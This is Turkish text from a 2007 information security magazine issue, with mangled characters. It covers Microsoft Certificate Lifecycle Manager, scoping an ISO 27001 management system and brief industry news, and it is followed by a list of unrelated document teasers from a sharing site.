inde ç karaca ve flu an Beta 2 aflamas nda olan Certificate Lifecycle Manager (CLM) ile iflletmelerde sertifika/kart da t m n kolaylaflt r p, yönetimi daha ölçeklenebilir hale getirmekte. CLM, Microsoft un 2005 y l nda sat n ald Alacris flirketine ait olan ve finans baflta olmak üzere farkl sektörlerde kullan lan idnexus ürünün daha da gelifltirilmesi ve MS CA destekli hale gelmesi ile çok güçlü bir araç halini ald. Kullan m Avantajlar CLM bulunmayan PKI çözümlerinde, özellikle sertifika flablonlar (certificate templates) oluflturma ve yay nlama, sertifika iste i onaylama ve reddetme gibi ifllemlerin tümü için Microsoft Management Console (MMC), komut sat r veya sertifika sunucusunun web arayüzü ile ayr ayr yap lmakta. CLM ile bu ifllemlerin tümü web tabanl bir yönetim arayüzü ile tek merkezden yap labilir hale getirilmekte. Tüm bu özelliklerin yan s ra ak ll kartlar n engellenmesi (block), uygulanan engellerin kald r lmas, tüm yap lan ifllemlerin raporlanmas ve belirli bir ifl ak fl na sokulmas özelliklerini de içerisinde bar nd r yor. Ürün bununla birlikte birden fazla sertifika sunucusunun (CA) çal flt ortamlar da desteklemekte. Ayn flekilde birden fazla CLM ile tek bir sertifika sunucusunu yönetmek de mümkün. Kullan c lar için sertifika ve kart bilgilerinin detayl olarak görüntülendi i, sertifika/kart isteklerinin yap ld ve PIN bilgilerinin de iflimine imkan sunan bir arayüzü de CLM de bulabilirsiniz. Böylelikle kurum içinde ilgili bilgi ifllem departman n n kullan c lardan gelen PKI bazl istek ve sorular na minimum kaynakla cevap verme imkan sa lan yor. CLM Bileflenleri Temeli web uygulamalar üzerine kurulan CLM kullan m için iflletim sistemi olarak minimum Windows Server 2003 platformu gerekiyor. Active Directory (AD) ve sertifika servisleri (CA) ile entegre çal flan CLM, kendi üretti i ve CA de üretilen bütün konfigürasyon verilerini Microsoft SQL Server üzerinde tutuyor. CLM belli bafll baz fonksiyonel bileflenlerden olufluyor. Her bileflen de kendi içerisinde farkl çekirdek modülleri içeriyor. Bu bileflenler: Microsoft Sertifika Makam CLM sunucu taraf bileflenleri Sertifika yönetici ve sahipleri Ak ll kartlar olarak s ralanmaktad r. Microsoft Sertifika Makam CLM, sertifika sunucusu olarak; Windows Server 2003 üzerine kurulu sertifika makam (CA) servislerini destekliyor. CA sunucusu üzerine CLM policy ve exit policy modüllerinin de kurulmas gerek. CLM Sunucu Taraf Bileflenleri Kurulum için Windows 2003 Server gerektiren CLM, arka tarafta Windows 2000/2003 AD yap s n da desteklemekle beraber veritaban sunucusu olarak Microsoft SQL Server 2000 (SP3) veya 2005 e ihtiyaç duyuyor. Web tabanl arayüz için minimum Microsoft Internet Information Server (IIS) 6.0 ve ASP.NET uygulamas n n çal flt r - labilmesi için.net Framework gerekiyor. CLM sunucu bileflenleri Active Directory güvenlik izinlerinin baz al nd Kullan c Web Portal ve Yönetim Web Portal web arayüzlerini de içerir. Sertifika Yönetici ve Sahipleri CLM in taray c bazl yönetim arayüzüne eriflmek için Internet Explorer 6 veya yukar bir sürüme sahip olman z yeterli. Secure Socket Layer/Transport Layer Security (SSL/TLS) özellikleri ile kullan larak, tüm yönetici ve sertifika trafi i sa lanmakta. CLM kullan c taraf nda sertifika yönetimi için herhangi bir yaz l m gerektirmemekle birlikte, da t m için opsyionel olarak Internet Explorer bazl bir kullan c uygulamas n da içerisinde bar nd r yor. Ak ll Kartlar PKI ortam nda CLM kullanabilmeniz için gerekli olan en son bileflenler; Ak ll Kart, Cyrptographic Service Provider (CSP) ve bir ak ll kart okuyucu. Beta 2 sürümü itibar yla desteklenen ak ll kart middleware leri flunlard r: Axalto Ver. 5.x AET SafeSign Standart Siemens HiPath S curity Card API V3.1 Gemplus GemSafe 4.2 Aladdin RTE 3.65 Planlama ve Kurulum ve Yeni Trendler Do ru bir PKI ortam ve kurulum için amaç, güvenlik modelleri ve ifl süreçlerine uygun bir analiz/planlama yap p, bu planlama do rultusunda sertifika sunucunuz üzerindeki kurallar ve flablonlar bu planlama do rultusunda yapman z en do ru yol olacakt r. Ayr ca günümüz iflletmelerinde fiziksel ve sistem güvenli inin entegrasyonuna özellikle önem verilmekte olup her zaman belirtti imiz gibi kurumunuzda birden fazla bilgi adac yaratmamaya gayret göstermekle birlikte ak ll kart dünyas nda da tek kartla hem fiziksel güvenlik (girifl-ç k fl, pdks vb.) hem sistem güvenli i uygulamalar n çözmenizde fayda var. Böylelikle CLM in ak ll kart envanteri tutma özelli inden faydalanabilir ve farkl kartlar n envanter ve yönetimi için daha baflka çözümlere yat r m yapma gere i duymazs n z. 36 beyazflapka flubat 2007 flubat 2007 beyazflapka 37

20 Murat LOSTAR Bilgi güvenli inde kapsam seçimi Bilgi Güvenli i Yönetim Sistemi (BGYS) kurman n ilk aflamas, kapsam n belirlenmesidir. Bilgi varl klar n n belirlenmesi, sahiplerin atanmas, güvenlik seviyelerinin sorgulanmas, risklerin ve mevcut durumun ortaya konmas kapsam taraf ndan yönlendirilir. Özellikle ISO sertifikas n amaçlayan bir yönetim sistemi kuruluyorsa, hangi süreçlerin, departmanlar n, flehirlerin kapsam içine al n p, hangilerinin d flar da b rak laca daha da önem kazan r. Ancak burada önemli sorularla karfl karfl ya kal r z. Bilgi güvenli i kapsam n diledi imiz gibi seçebilir miyiz? Hangi seçim yolu izlendi inde daha kolay ve baflar l sistemler kurulabilir? Kapsam n seçimi sadece yönetimin iste ine mi ba l d r? Kurumu herhangi bir yerinden dilimleyip, istedi imiz gibi bir kapsam belirleyebilir miyiz? Bu sorular n cevab n önce TS/ISO standard n inceleyerek bulmaya çal flal m. Standartta yer alan, Bu standartta, ifl terimi genifl anlamda kuruluflun varl k amaçlar n n temeli olan etkinlikler anlam na gelmektedir. (*) aç klamas, kapsam n mutlaka kuruluflun varl k amaçlar n n temeli olan etkinlikleri içermesi gerekti ini söylemektedir. Ayr ca, ayn standard n a maddesi de... kapsamdan herhangi bir d flar da b rakman n ayr nt lar ve aç klamas n da ekleyerek, BGYS kapsam n ve s n rlar n tan mlama zorunlulu unu ortaya koymaktad r. Standart maddelerinden de anlafl ld gibi, BGYS kapsam - n n, tüm flirket olma zorunlulu u yoktur, ama flirket varl k amaçlar n içermesi gerekmektedir. Örne in, bir finans kuruluflu, kendi finansal ifllerinden ya da süreçlerinden sadece bir k sm n kapsam olarak tan mlayabilir, ancak kapsam sadece çal flanlar n izin bilgilerini olarak vermesi çok ifle yarar olmayacakt r. Burada çal flan izinleri kurumun varl k amaçlar içinde yer almamaktad r. Oysa bir holdingin insan kaynaklar firmas için izin bilgileri en kritik bilgiler aras nda yer alabilir ve kapsam olarak seçilebilir. Kapsam yaz l hale getirilirken içinde yer alan süreç, önemli varl klar, ofisler, ba lant lar, iliflkiler ve anlaflmalar tan mlanmal d r. Kapsam içine alman n ve d fl nda b rakman n nedenlerinin de yaz l hale getirilmesi, bu kapsamla çal flacak tüm proje ekibinin istekleri daha iyi anlamas na ve daha do ru kararlar vermesine yard mc olacakt r. Ayr ca, kapsam tan m ne kadar ayr nt l yap l rsa, kapsam içi ile kapsam d fl aras ndaki gri alanlar, ne kadar ince bir çizgi haline getirilip yaz l hale sokulursa, proje bafllang c ve baflar olas l o kadar artar. Kapsam seçimi s ras nda kullan labilecek bir yöntem de, flekilde görüldü ü gibi, bir flema (görsel kapsam) haz rlanmas d r. Görsel kapsama, kapsam içindeki departman ve süreçler, bunlar n iliflkili oldu u di er flirket içi (ama kapsam d fl b rak lan) departman/süreçler ve son olarak flirket d fl kapsamla iliflkili kurumlar yerlefltirilir. Daha sonra, kapsam ile d fl ndakiler aras ndaki veri ak fllar oklarla belirtilir. Bu oklar n (flekilde kal n çizgiyle gösterilmifltir) kapsam s n rlar n kesti i yerler ise, bize, anlaflman n ya da mutabakat n zorunlu oldu u noktalar iflaret eder. Tüm bu iflaretli yerleri tan mlayan en az bir yaz l doküman n bulunmas iliflkilerin anlafl lmas n da kolaylaflt racakt r. KISA KISA KISA KISA KISA KISA KISA KISA KISA KISA NSS in yeni nesil gelifltirilmifl Multi-Gigabit Network IPS testlerinin ilk turu tamamland. 13 Ürünün kat ld ilk turda sadece McAfee IntruShield 4010 serisi testlerden geçebildi. Amerikan Ulusal Güvenlik Ajans (National Security Agency, NSA) sözcüsü Ken White, Microsoft Vista n n gelifltirme çal flmalar nda Microsoft a yard mc olduklar n aç klad. NSA, Amerikan Savunma Bakanl nca aç klanan gereksinimlere uygunluk sa lamak için bir çok flirkete ürün gelifltirme çal flmalar nda dan flmanl k sa l yor. Cisco Systems, web ve elektronik posta güvenli i sektörünün önemli oyuncular ndan IronPort flirketini 830 Milyon Dolara sat n ald. CheckPoint, IDS/IPS ve Firewall ürünlerine sahip NFR Security flirketini 20 Milyon Dolara sat n ald. Symantec, Continuous Data Protection (CDP) üreticisi Revivio flirketini sat n ald. Revivio ürünleri ile üzerinde de ifliklik yap lan dosyalar n eski ve yeni sürümleri sistem taraf ndan yedeklenebiliyor. Symantec, Revivio ürünlerini Symantec NetBackup ürün grubuna dahil edecek. 1 Aral k 2006 tarihinde US-CERT (United States-Computer ANA SPONSORLARIMIZ nebula KATILIMCI SPONSORLARIMIZ Emergency Response Team) bankalara ve finansal kurulumlara siber terörist sald r s alarm gönderdi. eeye, sadece S f r Gün (Zero-day) aç klar n takip eden bir hizmet gelifltirdi ini duyurdu. Microsoft antivirus pazar ndan sonra güvenlik ve uyumluluk denetimi pazar na da giriyor. Spider takma ad yla gelifltirilen yeni Microsoft ürünü tüm biliflim sisteminin güvenlik aç klar n taray p raporlayabiliyor. Türkiye de Kas m ve Aral k aylar nda binden fazla kifli MSN hesaplar n n çal nd ve kifliler listesinde bulunan tan d klar ndan cep telefonu kontörü istendi ini bildirerek emniyet birimlerine baflvurdu. Microsoft Process Monitor arac n duyurdu. Ücretsiz da- t m yap lan yaz l m iflletim sistemi de iflikliklerini izleyebiliyor. Yaz l m ücretsiz indirmek için Juniper Networks SSL-VPN ürünü grubu, Gartner raporlar ndan sonra Forrester raporlar nda da lider pozisyonunu ald. Kapsam seçerken, kurum için kritik bir bilgi/bilgi grubu seçilebilece i gibi, bir ya da birden fazla ifl süreci ya da bir departmandaki tüm süreçler kullan labilir. BGYS kurulmas genellikle süreçler üzerinden devam etti inden, kapsam n süreçlere ba l olarak seçilmesi çok daha yararl d r. Kurumun BGYS kapsam n n, bilgi güvenli i aç s ndan en geliflmifl süreçlerinden/departmanlar ndan bafllamas da bir baflka avantajd r. Böylece BGYS kurma çal flmalar s ras nda güvenlik seviyesinden çok, sistem kurmaya a rl k vermek mümkün olacakt r. Kapsam belirlemek kadar önemli olan bir di er konu, bilgi güvenli i yönetim sistemini kurmaya bafllad ktan sonra ilk döngü tamamlanana kadar kapsam de ifltirmemektir. Kapsam, beraberinde hemen tüm BGYS süreçlerini, varl klar n, iliflkilerini ve anlaflmalar n tan mlar. Bu yüzden kapsam n de iflmesi, tüm bu iliflkilerin yeniden de erlendirilmesini gerektirir. Güvenli günler! (*)TS ISO/EIC 27001:2005 Madde 1.1 INTERNET SPONSORU Beyaz fiapka ya katk lar ndan dolay tüm sponsorlar m za ve yazarlar m za teflekkür ederiz. Yay nlanan yaz lar n tüm sorumlulu u yazarlar na aittir. Lütfen her konuda fikrinizi yaz n. 38 beyazflapka flubat 2007

S STEM VE SÜREÇ DENET M NDE KARfiILAfiILAN SORUNLAR VE ÇÖZÜM ÖNER LER

S STEM VE SÜREÇ DENET M NDE KARfiILAfiILAN SORUNLAR VE ÇÖZÜM ÖNER LER S STEM VE SÜREÇ DENET M NDE KARfiILAfiILAN SORUNLAR VE ÇÖZÜM ÖNER LER Erol LENGERL / Akis Ba ms z Denetim ve SMMM A.fi. 473 474 2. Salon - Paralel Oturum VIII - Sistem ve Süreç Denetiminde Karfl lafl lan

Detaylı

WINDOWS SERVER 2008 R2 YE G R

WINDOWS SERVER 2008 R2 YE G R Ç NDEK LER 1 WINDOWS SERVER 2008 R2 YE G R fi 1 Temel Bilgiler 1 R2 deki Yenilikler 2 R2 SP1 deki Yenilikler 4 Sürümler 5 Yönetimsel Araçlar 9 Sunucu Yöneticisi (Server Manager) 9 Windows PowerShell 10

Detaylı

System Center Operations Manager 2007 Kurulum,Client Discovery ve Performans İzlemesi

System Center Operations Manager 2007 Kurulum,Client Discovery ve Performans İzlemesi System Center Operations Manager 2007 Kurulum,Client Discovery ve Performans İzlemesi Serhad MAKBULOĞLU MCSE/MCITP/MCT Serhad.makbuloglu@cozumpark.com Ajanda System Center Ürün Ailesine Genel Bakış SCOM

Detaylı

Tasarım Raporu. Grup İsmi. Yasemin ÇALIK, Fatih KAÇAK. Kısa Özet

Tasarım Raporu. Grup İsmi. Yasemin ÇALIK, Fatih KAÇAK. Kısa Özet Tasarım Raporu Grup İsmi Yasemin ÇALIK, Fatih KAÇAK Kısa Özet Tasarım raporumuzda öncelikle amacımızı belirledik. Otomasyonumuzun ana taslağını nasıl oluşturduğumuzu ve bu süreçte neler yaptığımıza karar

Detaylı

BİLGİ TEKNOLOJİLERİ VE İLETİŞİM KURULU KARARI

BİLGİ TEKNOLOJİLERİ VE İLETİŞİM KURULU KARARI BİLGİ TEKNOLOJİLERİ VE İLETİŞİM KURULU KARARI Karar Tarihi :22.02.2011 Karar No :2011/DK-10/91 Gündem Konusu :İnternetin Güvenli Kullanımı. KARAR : 5809 sayılı Kanunun 4 üncü 6 ncı ve 50 inci maddeleri

Detaylı

w w w. m i n t o n. c o m. t r K O L A Y K U R U L U M

w w w. m i n t o n. c o m. t r K O L A Y K U R U L U M w w w. m i n t o n. c o m. t r M D S L -2 0 9 A D S L M O D E M K O L A Y K U R U L U M K I L A V U Z U Girifl ADSL Ethernet & USB Router sat n ald n z için teflekkür ederiz! ADSL Router sizin varolan

Detaylı

Kocaeli Üniversitesi ktisadi ve dari Bilimler Fakültesi Ö retim Üyesi. 4. Bas

Kocaeli Üniversitesi ktisadi ve dari Bilimler Fakültesi Ö retim Üyesi. 4. Bas 1 Prof. Dr. Yunus Kishal Kocaeli Üniversitesi ktisadi ve dari Bilimler Fakültesi Ö retim Üyesi Tekdüzen Hesap Sistemi ve Çözümlü Muhasebe Problemleri 4. Bas Tekdüzen Muhasebe Sistemi Uygulama Tebli leri

Detaylı

Türkçe PG191. LCD Monitör. H zl Bafllatma K lavuzu

Türkçe PG191. LCD Monitör. H zl Bafllatma K lavuzu PG191 LCD Monitör H zl Bafllatma K lavuzu Güvenlik Bilgisi Monitörü ayarlamadan önce, paket ile birlikte gönderilen tüm belgeleri dikkatlice okuyunuz. Yang n veya elektrik çarpmas riskini önlemek için,

Detaylı

Animasyon Tabanl Uygulamalar n Yeri ve Önemi

Animasyon Tabanl Uygulamalar n Yeri ve Önemi Otomasyon Sistemleri E itiminde Animasyon Tabanl Uygulamalar n Yeri ve Önemi Murat Ayaz Kocaeli Üniversitesi Teknik E itim Fakültesi, Elektrik E itimi Koray Erhan Kocaeli Üniversitesi, Teknoloji Fakültesi,

Detaylı

Digifresh Kullanım Kılavuzu

Digifresh Kullanım Kılavuzu DigiFresh programını çalıştırmadan önce bilgisayarınıza Net Framework kütüphanesinin yüklü olması gerekmektedir. Aşağıdaki linkten indirelebilir. http://www.microsoft.com/tr-tr/download/confirmation.aspx?id=17851

Detaylı

OHSAS 18001 fl Sa l ve Güvenli i Yönetim Sisteminde Yap lan De iflikliklere Ayr nt l Bak fl

OHSAS 18001 fl Sa l ve Güvenli i Yönetim Sisteminde Yap lan De iflikliklere Ayr nt l Bak fl OHSAS 18001 fl Sa l ve Güvenli i Yönetim Sisteminde Yap lan De iflikliklere Ayr nt l Bak fl Altan ÇET NKAL MESS fl Sa l ve Güvenli i Uzman Geliflen yeni yönetim anlay fllar, hiyerarflik yap - lanmadan

Detaylı

5651 SAYILI YASANIN GEREKLER N TRCwifiZone LE UYGULAYIN

5651 SAYILI YASANIN GEREKLER N TRCwifiZone LE UYGULAYIN Her Yerden Kolay Internet Eriflimi ve Çözümleri 5651 SAYILI YASANIN GEREKLER N TRCwifiZone LE UYGULAYIN nternet Servisiniz Kontrolünüz Alt nda TRCwifiZone Nedir? TRCwifiZone; kablolu veya kablosuz internet

Detaylı

VSG 1200_v2 Kurulum ve Kullanım Kılavuzu

VSG 1200_v2 Kurulum ve Kullanım Kılavuzu VSG 1200_v2 Kurulum ve Kullanım Kılavuzu 1 Kurulum Seçenekleri Aşağıdaki kısım farklı kurulum seçeneklerini tanımlamktadır. Not: Kurulum sırasında kurulum deliklerini kapatmayınız ve VSG nin ön ve arka

Detaylı

ENTERPRISE CONTACT CENTER

ENTERPRISE CONTACT CENTER call center ENTERPRISE CONTACT CENTER SAPHIRA ülkemizin uluslararası arenada ekonomik ve teknolojik rekabet gücünü artırıcı niteliklere sahip olmak üzere; İ.Ü. Teknokent yerleşkesi içerisinde, geliştirmelerin

Detaylı

Bellek Analizi ile Zararlı Yazılım Analizi

Bellek Analizi ile Zararlı Yazılım Analizi Bellek Analizi ile Zararlı Yazılım Analizi Yine bir gün twitter.com/hack4career hesabından duyurulan hack edilmiş ve/veya zararlı yazılım barındıran web sitelerine göz atarken gün aşırı tespit edilen,

Detaylı

htiyaç Duydu unuz Herfley

htiyaç Duydu unuz Herfley Daha Fazla Daha yi Daha Kolay Güvenlik Yeni Nesil Güvenlik Çözümleri ile htiyaç Duydu unuz Herfley Application Control Sosyal a lar, video paylafl m siteleri ve benzeri di er web uygulamalar ifl araçlar

Detaylı

Mehmet TOMBAKO LU* * Hacettepe Üniversitesi, Nükleer Enerji Mühendisli i Bölümü

Mehmet TOMBAKO LU* * Hacettepe Üniversitesi, Nükleer Enerji Mühendisli i Bölümü Nükleer Santrallerde Enerji Üretimi ve Personel E itimi Mehmet TOMBAKO LU* Girifl Sürdürülebilir kalk nman n temel bileflenlerinden en önemlisinin enerji oldu unu söylemek abart l olmaz kan s nday m. Küreselleflen

Detaylı

Ç NDEK LER G R fi 1 Bafllamadan Önce 1 Kitab Kimler Okumal? 1 Kitap çerisindeki Örnekler 2 Örneklerin Kullan m 3 Çekinmeden Yaz n 7

Ç NDEK LER G R fi 1 Bafllamadan Önce 1 Kitab Kimler Okumal? 1 Kitap çerisindeki Örnekler 2 Örneklerin Kullan m 3 Çekinmeden Yaz n 7 +AS3-icindekiler 4/13/10 10:51 PM Page ix Ç NDEK LER G R fi 1 Bafllamadan Önce 1 Kitab Kimler Okumal? 1 Kitap çerisindeki Örnekler 2 Örneklerin Kullan m 3 Çekinmeden Yaz n 7 1 PROGRAMLAMAYA G R fi 9 Programlama

Detaylı

MSSQL Server 2000 Kurulumu

MSSQL Server 2000 Kurulumu MSSQL Server 2000 Kurulumu MSSQL Server 2000 Kurulumu ile ilgili işlem adımları Kurulum hazırlıkları : SQL Server 2000 in sistem ihtiyaçları gözden geçirilmelidir. Aşağıdaki tablo bu ürünün standart donanım

Detaylı

Uzem Eğitmen Girişi. Şekil 1. Sisteme girdikten sonra Şekil 2 deki ekran karşımıza çıkacak. Bu ekrandaki adımları kısaca tanıyalım.

Uzem Eğitmen Girişi. Şekil 1. Sisteme girdikten sonra Şekil 2 deki ekran karşımıza çıkacak. Bu ekrandaki adımları kısaca tanıyalım. Uzem Eğitmen Girişi Sisteme eğitmen olarak giriş yapabilmek için http://uzem.uskudar.edu.tr adresini internet tarayıcımızın adres satırına yazdıktan sonra Şekil 1 deki ekranda ilgili alanlara kullanıcı

Detaylı

Kendimiz Yapal m. Yavuz Erol* 16 Sütunlu Kayan Yaz

Kendimiz Yapal m. Yavuz Erol* 16 Sütunlu Kayan Yaz Kendimiz Yapal m Yavuz Erol* 16 Sütunlu Kayan Yaz Bu yaz da 8 sat r, 16 sütundan oluflan LED li kayan yaz projesi anlat l yor. Projenin en önemli özelli i gerek donan m gerekse yaz l m olarak basit olmas.

Detaylı

NTERNET ÇA I D NAM KLER

NTERNET ÇA I D NAM KLER Mustafa Emre C VELEK NTERNET ÇA I D NAM KLER www.internetdinamikleri.com STANBUL-2009 Yay n No : 2148 letiflim Dizisi : 55 1. Bas m - stanbul - Haziran 2009 ISBN 978-605 - 377-066 - 4 Copyright Bu kitab

Detaylı

2. Projelerle bütçe formatlar n bütünlefltirme

2. Projelerle bütçe formatlar n bütünlefltirme 2. Projelerle bütçe formatlar n bütünlefltirme Proje bütçesi haz rlarken dikkat edilmesi gereken üç aflama vard r. Bu aflamalar flunlard r: Kaynak belirleme ve bütçe tasla n n haz rlanmas Piyasa araflt

Detaylı

Merkezi Sterilizasyon Ünitesinde Hizmet çi E itim Uygulamalar

Merkezi Sterilizasyon Ünitesinde Hizmet çi E itim Uygulamalar Merkezi Sterilizasyon Ünitesinde Hizmet çi E itim Uygulamalar Hmfl. Sevgili GÜREL Emekli, Ac badem Sa l k Grubu Ac badem Hastanesi, Merkezi Sterilizasyon Ünitesi, STANBUL e-posta: sgurkan@asg.com.tr H

Detaylı

Beynimizi Nas l De ifltiriyor? Çeviri: DEN Z BENER

Beynimizi Nas l De ifltiriyor? Çeviri: DEN Z BENER Beynimizi Nas l De ifltiriyor? Çeviri: DEN Z BENER nternet, her fleyi de ifltirdi Hat rlamak ve zihnimizi kullanmak konusunda, geleneksel yöntemlerimizden h zla uzaklafl yoruz. Be endi imiz bir yeme in tarifini,

Detaylı

Balans Vanalar Termostatik Radyatör Vanalar. www.gedikdokum.com

Balans Vanalar Termostatik Radyatör Vanalar. www.gedikdokum.com www.gedikdokum.com Balans Vanalar Termostatik Radyatör Vanalar Is tma sistemlerinin balanslanmas sayesinde tüm sisteme do ru zamanda, gerekli miktarda debi ve dolay s yla gereken s her koflulda sa lanabilir.

Detaylı

ISI At f Dizinlerine Derginizi Kazand rman z çin Öneriler

ISI At f Dizinlerine Derginizi Kazand rman z çin Öneriler ISI At f Dizinlerine Derginizi Kazand rman z çin Öneriler Metin TUNÇ Seçici Olun ISI' n editoryal çal flanlar her y l yaklafl k olarak 2,000 dergiyi de erlendirmeye tabi tutmaktad r. Fakat de erlendirilen

Detaylı

SÜREÇ YÖNETİMİ VE SÜREÇ İYİLEŞTİRME H.Ömer Gülseren > ogulseren@gmail.com

SÜREÇ YÖNETİMİ VE SÜREÇ İYİLEŞTİRME H.Ömer Gülseren > ogulseren@gmail.com SÜREÇ YÖNETİMİ VE SÜREÇ İYİLEŞTİRME H.Ömer Gülseren > ogulseren@gmail.com Giriş Yönetim alanında yaşanan değişim, süreç yönetimi anlayışını ön plana çıkarmıştır. Süreç yönetimi; insan ve madde kaynaklarını

Detaylı

TÜRK YE B L MSEL VE TEKNOLOJ K ARAfiTIRMA KURUMU DESTEK PROGRAMLARI BAfiKANLIKLARI KURULUfi, GÖREV, YETK VE ÇALIfiMA ESASLARINA L fik N YÖNETMEL K (*)

TÜRK YE B L MSEL VE TEKNOLOJ K ARAfiTIRMA KURUMU DESTEK PROGRAMLARI BAfiKANLIKLARI KURULUfi, GÖREV, YETK VE ÇALIfiMA ESASLARINA L fik N YÖNETMEL K (*) TÜRK YE B L MSEL VE TEKNOLOJ K ARAfiTIRMA KURUMU DESTEK PROGRAMLARI BAfiKANLIKLARI KURULUfi, GÖREV, YETK VE ÇALIfiMA ESASLARINA L fik N YÖNETMEL K (*) Amaç ve Kapsam Madde 1- Bu Yönetmelik, Türkiye Bilimsel

Detaylı

Ders 3: SORUN ANAL Z. Sorun analizi nedir? Sorun analizinin yöntemi. Sorun analizinin ana ad mlar. Sorun A ac

Ders 3: SORUN ANAL Z. Sorun analizi nedir? Sorun analizinin yöntemi. Sorun analizinin ana ad mlar. Sorun A ac Ders 3: SORUN ANAL Z Sorun analizi nedir? Sorun analizi, toplumda varolan bir sorunu temel sorun olarak ele al r ve bu sorun çevresinde yer alan tüm olumsuzluklar ortaya ç karmaya çal fl r. Temel sorunun

Detaylı

İstemci Yönetimi ve Mobile Printing (Mobil Baskı) Çözümleri

İstemci Yönetimi ve Mobile Printing (Mobil Baskı) Çözümleri İstemci Yönetimi ve Mobile Printing (Mobil Baskı) Çözümleri Kullanıcı Kılavuzu Telif Hakkı 2006 Hewlett-Packard Development Company, L.P. Microsoft ve Windows, Microsoft Corporation kuruluşunun ABD'de

Detaylı

ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM

ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM 1. Sistem 3 bileşenden oluşur a. Sunucu b. Koruma yazılımı c. Mobil anahtar ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM Sunucu yazılımı: sunucu yazılımı öncelikle yerel ağda et (etkileşimli tahtaların) bağlı

Detaylı

BİT ini Kullanarak Bilgiye Ulaşma ve Biçimlendirme (web tarayıcıları, eklentiler, arama motorları, ansiklopediler, çevrimiçi kütüphaneler ve sanal

BİT ini Kullanarak Bilgiye Ulaşma ve Biçimlendirme (web tarayıcıları, eklentiler, arama motorları, ansiklopediler, çevrimiçi kütüphaneler ve sanal BİT ini Kullanarak Bilgiye Ulaşma ve Biçimlendirme (web tarayıcıları, eklentiler, arama motorları, ansiklopediler, çevrimiçi kütüphaneler ve sanal müzeler vb.) Bilgi ve iletişim teknolojileri, bilgiye

Detaylı

Uygulama Önerisi 1110-2: ç Denetim Yöneticisi- Hiyerarflik liflkiler

Uygulama Önerisi 1110-2: ç Denetim Yöneticisi- Hiyerarflik liflkiler Uygulama Önerileri 59 Uygulama Önerisi 1110-2: ç Denetim Yöneticisi- Hiyerarflik liflkiler Uluslararas ç Denetim Meslekî Uygulama Standartlar ndan Standart 1110 un Yorumu lgili Standart 1110 Kurum çi Ba

Detaylı

FormSeries müşterileri operasyon ekibinin bir parçası haline getiren yeni bir hizmet kanalı yaratmayı hedeflemektedir.

FormSeries müşterileri operasyon ekibinin bir parçası haline getiren yeni bir hizmet kanalı yaratmayı hedeflemektedir. FormSeries Nedir? FormSeries, müşteriler tarafından elle doldurulan form veya dilekçelerin okunmasını ve bu döküman aracılığıyla iletilen tüm talep ve talimatların otomatik olarak gerçekleştirilmesini

Detaylı

Hakkımızda NBN BİLİŞİM HİZMETLERİ

Hakkımızda NBN BİLİŞİM HİZMETLERİ 1 2 Hakkımızda NBN 2015 yılında uzun yılların tecrübesini ses ve network çözümlerinde birleştiren ekip tarafından kurulan bir bilişim şirketidir. Kurulduğu günden bu yana sektörde birçok önemli kablolama,

Detaylı

QR Kodu Tarayıcısı / Okuyucusuna Uygun Uygulamalarda Kullanım İçin

QR Kodu Tarayıcısı / Okuyucusuna Uygun Uygulamalarda Kullanım İçin Xerox QR Code Uygulaması Hızlı Başlangıç Kılavuzu 702P03999 QR Kodu Tarayıcısı / Okuyucusuna Uygun Uygulamalarda Kullanım İçin QR (Quick Response) Code Uygulamasını şu uygulamalarla birlikte kullanınız:

Detaylı

Tek bir Satınalma Hesabı ile birden fazla iş ortağı ile çalışabilir miyim?

Tek bir Satınalma Hesabı ile birden fazla iş ortağı ile çalışabilir miyim? Microsoft Ürün ve Hizmet Sözleşmesi nedir? Microsoft Ürün ve Hizmet Sözleşmesi (MPSA), daha fazla esneklik ve kolaylaştırılmış self servis araçlar sağlayan basitleştirilmiş bir sözleşmedir. MPSA, Microsoft

Detaylı

İKİNCİ BÖLÜM EKONOMİYE GÜVEN VE BEKLENTİLER ANKETİ

İKİNCİ BÖLÜM EKONOMİYE GÜVEN VE BEKLENTİLER ANKETİ İKİNCİ BÖLÜM EKONOMİYE GÜVEN VE BEKLENTİLER ANKETİ 120 kinci Bölüm - Ekonomiye Güven ve Beklentiler Anketi 1. ARAfiTIRMANIN AMACI ve YÖNTEM Ekonomiye Güven ve Beklentiler Anketi, tüketici enflasyonu, iflsizlik

Detaylı

Kişisel Bilgiler ve Kişisel olmayan bilgiler Kişisel bilgiler sizi bir birey olarak tanımlayan veya tanımlanmanızı sağlayan bilgilerdir.

Kişisel Bilgiler ve Kişisel olmayan bilgiler Kişisel bilgiler sizi bir birey olarak tanımlayan veya tanımlanmanızı sağlayan bilgilerdir. Gizlilik İlkesi Bu gizlilik ilkesi ( Gizlilik İlkesi ) zaman zaman değiştirilebilir. Değişiklikleri size özellikle bildirmeyeceğiz, bu nedenle bu Gizlilik İlkesi'ni yeniden okumak ve değişikliklerden haberdar

Detaylı

BQ360 Modbus Dijital Giriş 24 Kanal. Kullanım Kılavuzu. Doküman Versiyon: 1.2 01.02.2016 BQTEK

BQ360 Modbus Dijital Giriş 24 Kanal. Kullanım Kılavuzu. Doküman Versiyon: 1.2 01.02.2016 BQTEK Modbus Dijital Giriş 24 Kanal Kullanım Kılavuzu Doküman Versiyon: 1.2 01.02.2016 BQTEK İçindekiler İçindekiler... 2 1. Cihaz Özellikleri... 3 2. Genel Bilgi... 4 2.1. Genel Görünüm... 4 2.3 Cihaz Boyutları...

Detaylı

MESLEK MENSUPLARI AÇISINDAN TÜRK YE DENET M STANDARTLARININ DE ERLEND R LMES

MESLEK MENSUPLARI AÇISINDAN TÜRK YE DENET M STANDARTLARININ DE ERLEND R LMES MESLEK MENSUPLARI AÇISINDAN TÜRK YE DENET M STANDARTLARININ DE ERLEND R LMES Ahmet AKIN / TÜRMOB Yönetim Kurulu Üyesi 387 388 Genel Oturum III - Meslek Mensuplar Aç s ndan Türkiye Denetim Standartlar n

Detaylı

Tor Üzerinden VPN Servisi "Privatoria"

Tor Üzerinden VPN Servisi Privatoria Tor Üzerinden VPN Servisi "Privatoria" Geçtiğimiz günlerde ortaya çıkan yeni bir oluşum internette güvenli gezinme yöntemlerimiz arasına bir yenisini daha ekledi. Privatoria adıyla yayın hayatına başlayan

Detaylı

MikroÖdeme Servis Dökümanı

